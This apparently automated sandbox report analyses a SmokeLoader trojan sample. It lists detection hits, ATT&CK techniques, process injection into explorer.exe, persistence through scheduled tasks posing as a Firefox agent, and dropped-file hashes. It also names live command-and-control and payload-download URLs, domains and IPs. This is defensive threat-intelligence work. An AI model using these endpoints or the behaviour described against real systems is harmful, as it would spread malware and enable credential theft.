                Source: explorer.exe, 00000002.00000000.2115964908.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

                Stealing of Sensitive Information

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected SmokeLoader
                Source: Yara matchFile source: 9.2.jtihrdr.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.3.jtihrdr.530000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.3.B9A0.exe.20c0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.B9A0.exe.1fa0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.jtihrdr.520e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		32
                Process Injection                		11
                Masquerading                		OS Credential Dumping511
                Security Software Discovery                		Remote ServicesData from Local System1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		12
                Virtualization/Sandbox Evasion                		LSASS Memory12
                Virtualization/Sandbox Evasion                		Remote Desktop ProtocolData from Removable Media3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
                Process Injection                		Security Account Manager3
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Hidden Files and Directories                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture115
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials12
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528058 Sample: BzLGqYKy7o.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 39 nwgrus.ru 2->39 41 calvinandhalls.com 2->41 43 bestworldhools.com 2->43 45 Suricata IDS alerts for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 8 BzLGqYKy7o.exe 2->8         started        11 teihrdr 2->11         started        13 jtihrdr 2->13         started        15 teihrdr 2->15         started        signatures3 process4 signatures5 69 Detected unpacking (changes PE section rights) 8->69 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->71 73 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->73 75 Switches to a custom stack to bypass stack traces 8->75 17 explorer.exe 76 6 8->17 injected 77 Antivirus detection for dropped file 11->77 79 Multi AV Scanner detection for dropped file 11->79 81 Machine Learning detection for dropped file 11->81 83 Maps a DLL or memory area into another process 13->83 85 Checks if the current machine is a virtual machine (disk enumeration) 13->85 87 Creates a thread in another existing process (thread injection) 13->87 process6 dnsIp7 33 23.145.40.164, 443, 49932 SURFAIRWIRELESS-IN-01US Reserved 17->33 35 nwgrus.ru 105.197.97.247, 49770, 49776, 49782 RAYA-ASEG Egypt 17->35 37 2 other IPs or domains 17->37 25 C:\Users\user\AppData\Roaming\teihrdr, PE32 17->25 dropped 27 C:\Users\user\AppData\Roaming\jtihrdr, PE32 17->27 dropped 29 C:\Users\user\AppData\Local\Temp\B9A0.exe, PE32 17->29 dropped 31 C:\Users\user\...\teihrdr:Zone.Identifier, ASCII 17->31 dropped 53 System process connects to network (likely due to code injection or exploit) 17->53 55 Benign windows process drops PE files 17->55 57 Deletes itself after installation 17->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->59 22 B9A0.exe 17->22         started        file8 signatures9 process10 signatures11 61 Antivirus detection for dropped file 22->61 63 Detected unpacking (changes PE section rights) 22->63 65 Machine Learning detection for dropped file 22->65 67 5 other signatures 22->67

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                BzLGqYKy7o.exe32%ReversingLabs
                BzLGqYKy7o.exe100%AviraHEUR/AGEN.1310247
                BzLGqYKy7o.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\teihrdr100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Local\Temp\B9A0.exe100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\jtihrdr100%AviraHEUR/AGEN.1310247
                C:\Users\user\AppData\Roaming\teihrdr100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\B9A0.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\jtihrdr100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\teihrdr32%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://android.notify.windows.com/iOS0%URL Reputationsafe
                https://powerpoint.office.comcember0%URL Reputationsafe
                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
                https://api.msn.com/0%URL Reputationsafe
                https://excel.office.com0%URL Reputationsafe
                http://schemas.micro0%URL Reputationsafe
                http://crl.v0%URL Reputationsafe
                https://outlook.com0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                calvinandhalls.com
                		188.40.141.211
                		truetrue
                  		unknown
                  nwgrus.ru
                  		105.197.97.247
                  		truetrue
                    		unknown
                    bestworldhools.com
                    		188.40.141.211
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://calvinandhalls.com/search.phptrue
                        		unknown
                        http://tech-servers.in.net/tmp/index.phptrue
                          		unknown
                          https://23.145.40.164/ksa9104.exetrue
                            		unknown
                            https://bestworldhools.com/search.phptrue
                              		unknown
                              http://unicea.ws/tmp/index.phptrue
                                		unknown
                                http://nwgrus.ru/tmp/index.phptrue
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://word.office.comonexplorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2121740943.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121740943.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2121214816.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2121214816.000000000C549000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.msn.com/explorer.exe, 00000002.00000000.2119469337.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://excel.office.comexplorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.microexplorer.exe, 00000002.00000000.2118897600.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118355378.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118873758.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://crl.vexplorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://outlook.comexplorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        188.40.141.211
                                        		calvinandhalls.comGermany
                                        		24940HETZNER-ASDEtrue
                                        105.197.97.247
                                        		nwgrus.ruEgypt
                                        		24835RAYA-ASEGtrue
                                        189.195.132.134
                                        		unknownMexico
                                        		13999MegaCableSAdeCVMXtrue
                                        23.145.40.164
                                        		unknownReserved
                                        		22631SURFAIRWIRELESS-IN-01UStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528058
                                        Start date and time:2024-10-07 14:58:03 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:BzLGqYKy7o.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:d0d4805488e7e745515fff2165d3cc05.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@6/4@7/4
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 73
                                        • Number of non-executed functions: 9
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: BzLGqYKy7o.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        08:59:11API Interceptor329327x Sleep call for process: explorer.exe modified
                                        14:59:20Task SchedulerRun new task: Firefox Default Browser Agent E99ED912E432380B path: C:\Users\user\AppData\Roaming\teihrdr
                                        15:00:11Task SchedulerRun new task: Firefox Default Browser Agent 934EE7DA49EF2551 path: C:\Users\user\AppData\Roaming\jtihrdr

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        188.40.141.211w4DO1Z18yg.wsfGet hashmaliciousSmokeLoaderBrowse
                                        • ceoconstractionstore.pl/index.php
                                        UkHkCa3IYV.wsfGet hashmaliciousSmokeLoaderBrowse
                                        • ceoconstractionstore.pl/index.php
                                        3312.PDF.wsfGet hashmaliciousSmokeLoaderBrowse
                                        • ceoconstractionstore.pl/index.php
                                        RmbF3635xY.exeGet hashmaliciousSmokeLoaderBrowse
                                        • ceoconstractionstore.pl/index.php
                                        abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeGet hashmaliciousCryptOne, Nymaim, PrivateLoader, RedLine, SmokeLoader, onlyLoggerBrowse
                                        • gmpeople.com/upload/
                                        vwaoMjcyAw.exeGet hashmaliciousSmokeLoaderBrowse
                                        • selebration17io.io/index.php
                                        Qi4Mj8hG3t.exeGet hashmaliciousSmokeLoaderBrowse
                                        • selebration17io.io/index.php
                                        br0A8E2X6I.exeGet hashmaliciousSmokeLoaderBrowse
                                        • selebration17io.io/index.php
                                        setup.exeGet hashmaliciousBabuk, DjvuBrowse
                                        • zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true
                                        SecuriteInfo.com.Win32.Evo-gen.21074.1738.exeGet hashmaliciousSmokeLoaderBrowse
                                        • agressivemnaiq.xyz/
                                        105.197.97.247msvR1bl94M.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 100xmargin.com/tmp/index.php
                                        j1NeIT4ojp.exeGet hashmaliciousSmokeLoaderBrowse
                                        • epohe.ru/tmp/
                                        UICbFTrVH4.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 100xmargin.com/tmp/index.php
                                        189.195.132.134XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                        • sdfjhuz.com/dl/buildz.exe
                                        AaIo4VGgvO.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                        • cajgtus.com/files/1/build3.exe
                                        SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                        • sajdfue.com/files/1/build3.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        bestworldhools.comUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        calvinandhalls.comUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        nwgrus.ruUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 185.12.79.25
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 197.164.156.210
                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.147.128.172
                                        HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 177.129.90.106
                                        c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.147.2.86
                                        9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.224.203.37
                                        veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 58.151.148.90
                                        v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.219.117.240
                                        0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 189.61.54.32
                                        qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 181.52.122.51

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        HETZNER-ASDEhttps://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                        • 85.10.195.17
                                        UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                        • 148.251.114.233
                                        zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                        • 116.203.9.188
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 188.40.141.211
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 116.203.104.203
                                        na.elfGet hashmaliciousUnknownBrowse
                                        • 116.203.104.203
                                        http://suraj-tumuluri.github.io/UI-Clone-NetflixGet hashmaliciousHTMLPhisherBrowse
                                        • 78.46.22.25
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 91.107.182.122
                                        https://thiiirrrrddddddd-30x.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                        • 195.201.57.90
                                        SURFAIRWIRELESS-IN-01USUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.162
                                        MegaCableSAdeCVMXxd.arm.elfGet hashmaliciousMiraiBrowse
                                        • 187.246.98.10
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 177.230.234.128
                                        yakov.arm7.elfGet hashmaliciousMiraiBrowse
                                        • 187.240.239.91
                                        SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                                        • 187.241.225.173
                                        mlnZfOifRX.elfGet hashmaliciousOkiruBrowse
                                        • 177.226.231.31
                                        SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                                        • 201.132.172.57
                                        m68k.elfGet hashmaliciousUnknownBrowse
                                        • 148.216.187.54
                                        154.213.187.80-arm-2024-08-30T23_29_44.elfGet hashmaliciousMiraiBrowse
                                        • 189.194.242.57
                                        firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                        • 148.216.239.219
                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                        • 177.243.32.122
                                        RAYA-ASEGna.elfGet hashmaliciousMirai, OkiruBrowse
                                        • 41.68.96.102
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 41.68.96.146
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 62.68.231.166
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 41.70.6.198
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 41.70.6.194
                                        na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 41.68.48.233
                                        na.elfGet hashmaliciousMiraiBrowse
                                        • 197.132.199.54
                                        gmpsl.elfGet hashmaliciousMiraiBrowse
                                        • 197.132.31.215
                                        mips.elfGet hashmaliciousMiraiBrowse
                                        • 41.68.96.126
                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 197.132.199.57

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        72a589da586844d7f0818ce684948eeaUV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        HaPJ2rPP6w.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        9VgIkx4su0.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        v173TV3V11.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        0k3ibTiMjy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        qg5Ddf4an9.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 23.145.40.164
                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                        • 188.40.141.211
                                        c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 188.40.141.211
                                        KClGcCpDAP.exeGet hashmaliciousUnknownBrowse
                                        • 188.40.141.211

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\B9A0.exe

                                        Download File
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):445952
                                        Entropy (8bit):6.33809988244996
                                        Encrypted:false
                                        SSDEEP:6144:LwUZ9L7YogfjUt9cFAKm8shskq17c4IARUEe+8ULQTdVjzwa4opTT:LfZh7YokjUbc9m8shsXA0UP+gNLT
                                        MD5:0719C6940AABCC832DB40F7EE68A25DC
                                        SHA1:0D23A06DAA49E69D41ED406C32C6EE2C4F8445E1
                                        SHA-256:77931F6678ADECE99070E617DCC98A2E9BE636803BFE8DED58CF8A5362DD4430
                                        SHA-512:0264DE6170008268F46EC96CC2FF2EB34A1D71EA841BE909810A1A891339BADCB2E9E3020FDEE04288ED5070A19668ADDE2E6C153FBAA10D9F577D7C1B009EAE
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............._..._..._..L_..._..y_..._..x_..._.A_..._..._S.._..}_..._..H_..._..O_..._Rich..._........................PE..L......e.............................9............@.........................................................................u..P....................................u..............................Xl..@............................................text............................... ..`.rdata..R...........................@..@.data............^...t..............@....fulocu.............................@..@.soro...............................@..@.kefef..............................@....rsrc...............................@..@........................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\jtihrdr

                                        Download File
                                        Process:C:\Windows\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:modified
                                        Size (bytes):445952
                                        Entropy (8bit):6.33809988244996
                                        Encrypted:false
                                        SSDEEP:6144:LwUZ9L7YogfjUt9cFAKm8shskq17c4IARUEe+8ULQTdVjzwa4opTT:LfZh7YokjUbc9m8shsXA0UP+gNLT
                                        MD5:0719C6940AABCC832DB40F7EE68A25DC
                                        SHA1:0D23A06DAA49E69D41ED406C32C6EE2C4F8445E1
                                        SHA-256:77931F6678ADECE99070E617DCC98A2E9BE636803BFE8DED58CF8A5362DD4430
                                        SHA-512:0264DE6170008268F46EC96CC2FF2EB34A1D71EA841BE909810A1A891339BADCB2E9E3020FDEE04288ED5070A19668ADDE2E6C153FBAA10D9F577D7C1B009EAE
                                        Malicious:true
                                        Antivirus:
